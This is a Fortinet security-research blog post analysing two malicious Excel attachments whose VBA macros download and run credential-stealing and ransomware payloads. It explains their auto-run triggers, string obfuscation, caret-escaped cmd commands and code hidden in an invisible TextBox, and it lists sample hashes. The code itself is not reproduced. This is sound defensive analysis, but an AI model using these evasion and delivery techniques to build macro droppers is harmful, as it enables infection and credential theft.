by RSS Xiaopeng Zhang  |  Mar 08, 2017  |  Filed in: Security Research

Over the last few years we have received a number of emails with attached Word files that spread malware.  Now it seems that it is becoming more and more popular to spread malware using malicious Excel files. Lately, Fortinet has collected a number of email samples with Excel files attached (.xls, .xlsm) that spread malware by executing malicious VBA (Visual Basic for Applications) code.

VBA is a programming language used by Microsoft Office suite. Normally, VBA is used to develop programs for Excel to perform some tasks.

I’ll use two examples to explain how Excel files can be used to spread malware.

Excel Malware Sample 1

When the infected file is opened in Excel, a message pops up asking the user to enable the macro security option by clicking the “Enable Content” button. Once the macro function is enabled, the malicious VBA code inside the sample is executed. See Figure 1.

Figure 1. An Excel message to enable macros

Figure 1. An Excel message to enable macros

 

The file in this example is an OLE format Excel file that was collected on Feb 27, 2017. Its original file name is “payment.xls”, which was detected as virus “WM/Agent.D9E2!tr.dldr” by Fortinet because it contains malicious VBA code.

  • Here is the OLE structure of this sample

Figure 2. The OLE structure of this sample

Figure 2. The OLE structure of this sample

From the parsing result of the OLE file analysis tool, the malicious VBA code exists in the Module1 stream. So I extracted the VBA code from it.

  • Here is the VBA code snippet

As you can see from the above VBA code, there is a function named “Auto_Open”, which is called automatically when the file is opened in Excel. Based on our analysis of other malicious VBA-based samples, the functions “ShellExecute”, “Shell”, “WScript.Shell”, and “Run” are usually called to execute DOS commands. In this sample, the “Shell” function is called at the bottom to execute the malicious command.

This VBA code is easy to understand. First, it creates some arrays with short names by calling the Array function. Second, it generates some strings by concatenating elements of the arrays by their indexes. Finally, it puts the strings together in a special order to generate the final command string.

Actually, this is a kind of code obfuscation technique used to avoid being detected and analyzed. The final string is the malicious command being executed by the “Shell” function. In this sample, the first parameter “ugsubpox” holds the command string. 

  • Debugging the VBA code with Microsoft Visual Basic for Applications

Figure 3. Analyzing the VBA code

Figure 3. Analyzing the VBA code

  • Downloading other malware

As analyzed in Figure 3, here is the string in the variable “ugsubpox”:

It looks weird because of the code obfuscation. We can see a DOS command will be executed by calling cmd.exe. There are many ‘^’ symbols in this command, but we can directly ignore them because ‘^’ in DOS shell is the escape character. So, after removing all the ‘^’ symbols and changing all the characters to lowercase because Windows commands are not case-sensitive, the string looks clearer and is easier to understand:

“cmd.exe /c” initiates running a new cmd shell, executing the command specified by the string, and terminating it. As a result, executing this command will download an .exe file into “%appdata%.exe” and execute it.

In fact, the downloaded .exe file is a downloader of Dyzap malware. Later, it will download another .exe file called “paray.txt”, the new variant of Dyzap, and run it to keep stealing credentials from infected systems. Finally, the stolen credential data is encrypted and sent to its C&C server.

For more information about Dyzap, you can read the blog from Bahare Sabouri and He Xu.  

In our collection system we gathered lots of Excel samples containing similar VBA code. They are used to spread different kinds of malware, including Trojans, Ransomware, Spyware, Bots, etc.

Excel Malware Sample 2

Another Excel malware sample was first collected in our system on Feb 27, 2017. It’s also an OLE format file.

  • The OLE structure of this sample

This sample contains modules and controls. Here is its structure.

Figure 4. The OLE structure of this sample

Figure 4. The OLE structure of this sample

From the parsing result of the OLE file analysis tool, we can see the VBA code is stored in streams “_VBA_PROJECT_CUR/VBA/ThisWorkbook”, “_VBA_PROJECT_CUR/VBA/Module1”, and “_VBA_PROJECT_CUR/UserForm1/o”. Inside the VBA project there is a “TextBox” control. Its “Text” property contains malicious code, which is invisible by default. It can be accessed easily by VBA code.  See Figure 5, below.

Figure 5. Malicious code hidden in TextBox control

Figure 5. Malicious code hidden in TextBox control

Once this sample is opened in Excel, the function “Workbook_Open” inside the stream “ThisWorkbook” will be called if the Macro security option is enabled. The VBA code is designed to extract the malicious code from stream “_VBA_PROJECT_CUR/UserForm1/o” into a file called “gtls.vbs” and then execute it. 

  • The VBA code extracting vbs code from TextBox control into “gtls.vbs”

  • Here is the code of “gtls.vbs”

When going through all the code you can easily understand its purpose. When it is executed it downloads a file from “hxxp://****anox.comxa.com/dix/disk” into “%appdata%\disk.exe”. The file “disk.exe” is executed by calling “oShell.Run”.  See Figure 6, below.

Figure 6. The properties of the downloaded file

Figure 6. The properties of the downloaded file

After a quick analysis we can see that this is a new variant of Strictor, which is ransomware. Fortinet has been identified it as virus “W32/Delf.EFUQ!tr”.

Conclusion

Based on our observation, we are seeing an increase in the number and kinds of malware being spread by Microsoft Office files, like what we have shown in the above Excel samples. To protect against them, users should be very careful when opening files with Microsoft Office attachments from untrusted sources.

Excel Sample SHA256s:

0abdc28b70c032810ac5a3de80f1b40fd740ad5fc1dbe033a12103e16a66f15d
898d137e4d676ac02ff83c607abbe24a8187e1fcda895b100f157e2eb8d9dffb

 

by RSS Xiaopeng Zhang  |  Mar 08, 2017  |  Filed in: Security Research